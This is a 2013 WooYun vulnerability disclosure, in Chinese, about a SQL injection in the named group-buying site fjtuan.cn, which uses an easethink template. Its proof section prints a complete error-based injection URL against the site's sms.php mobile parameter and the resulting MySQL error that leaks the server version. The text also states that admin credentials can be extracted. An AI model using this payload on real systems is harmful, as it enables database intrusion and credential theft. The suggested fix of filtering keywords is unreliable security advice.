当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037750

漏洞标题:附近团网站注入漏洞

相关厂商:http://www.fjtuan.cn/

漏洞作者: weiweiwind

提交时间:2013-09-22 11:21

修复时间:2013-12-21 11:22

公开时间:2013-12-21 11:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

附近团使用easethink模板,存在注入漏洞。

详细说明:

附近团使用easethink模板,存在注入漏洞。
可以通过手工注入,最终注入得到管理员用户名密码。

漏洞证明:

访问http://www.fjtuan.cn/sms.php?act=subscribe得到验证码,

.JPG


再次提交url:http://www.fjtuan.cn/sms.php?act=do_subscribe&verify=1046&mobile=111'%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23
看到mysql数据库版本:5.1.38-community
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from easethink_mobile_list where mobile='111' and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#' ) [2] => Array ( [error] => Duplicate entry '|5.1.38-community|1' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )

修复方案:

过滤关键字

版权声明:转载请注明来源 weiweiwind@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝